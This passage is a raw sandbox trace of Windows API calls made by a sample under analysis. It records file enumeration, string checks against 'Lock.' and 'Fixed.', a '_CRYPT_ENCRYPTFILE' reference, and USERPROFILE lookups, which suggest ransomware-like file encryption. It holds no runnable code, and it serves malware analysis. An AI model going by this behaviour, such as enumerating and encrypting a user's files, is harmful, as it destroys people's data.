wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.250] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.250] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe435730, ftCreationTime.dwHighDateTime=0x1d5e8ad, ftLastAccessTime.dwLowDateTime=0x2a789f0, ftLastAccessTime.dwHighDateTime=0x1d5eb46, ftLastWriteTime.dwLowDateTime=0x2a789f0, ftLastWriteTime.dwHighDateTime=0x1d5eb46, nFileSizeHigh=0x0, nFileSizeLow=0x11daa, dwReserved0=0x0, dwReserved1=0x0, cFileName="yuOTM-ydpavUWyQnpT.gif", cAlternateFileName="YUOTM-~1.GIF")) returned 1 [0247.250] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.250] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.250] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.250] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.251] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.251] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="踚@锴\x97\x8c蘔J㳻@腸J\x8c\x8c㵶@\x8c\x8c藴Ja")) returned 0 [0247.251] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.251] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.251] FindClose (in: hFindFile=0xa87690 | out: hFindFile=0xa87690) returned 1 [0247.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0247.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0247.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0247.251] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.251] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.253] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0247.253] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0247.253] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0247.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="abBnrhJwU.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0247.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bBnrhJwU.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0247.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BnrhJwU.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0247.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nrhJwU.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0247.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rhJwU.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0247.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hJwU.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0247.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JwU.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0247.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wU.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0247.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0247.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0247.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0247.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0247.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0247.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0247.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0247.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0247.254] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0247.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="abBnrhJwU.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0247.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bBnrhJwU.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0247.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BnrhJwU.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0247.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nrhJwU.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0247.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rhJwU.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0247.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hJwU.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0247.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JwU.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0247.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wU.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0247.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0247.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0247.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0247.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0247.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0247.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0247.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0247.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0247.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0247.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0247.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0247.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0247.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0247.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0247.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0247.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0247.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0247.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0247.255] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0247.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0247.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0247.255] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0247.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0247.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0247.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0247.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b68 [0247.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0247.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0247.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0247.255] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0247.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0247.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0247.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0247.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0247.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0247.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0247.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0247.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0247.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0247.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0247.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0247.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0247.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0247.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0247.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0247.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0247.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0247.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0247.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ba8 [0247.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0247.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0247.256] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0247.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0247.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0247.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0247.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0247.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0247.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0247.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0247.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0247.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0247.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0247.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0247.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0247.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0247.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0247.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0247.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0247.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0247.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0247.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0247.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0247.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0247.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0247.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0247.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0247.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0247.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511d8 [0247.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0247.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0247.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0247.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0247.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0247.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0247.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0247.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0247.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0247.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0247.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0247.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55df8 [0247.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0247.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0247.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0247.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0247.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0247.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0247.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0247.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0247.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0247.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0247.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0247.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0247.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0247.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0247.258] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0247.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0247.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0247.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0247.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0247.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0247.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0247.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0247.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0247.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0247.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0247.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0247.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0247.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0247.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0247.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0247.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0247.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0247.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0247.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0247.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0247.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0247.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0247.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0247.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0247.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0247.259] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0247.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0247.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0247.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0247.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0247.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0247.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0247.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0247.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0247.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0247.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0247.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0247.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0247.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0247.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0247.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0247.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0247.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0247.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0247.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0247.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0247.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0247.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0247.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0247.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0247.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0247.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0247.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0247.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0247.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0247.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0247.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0247.260] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0247.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0247.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0247.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0247.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0247.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0247.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0247.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0247.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0247.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0247.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0247.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0247.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0247.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0247.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54800 | out: hHeap=0x970000) returned 1 [0247.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0247.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: 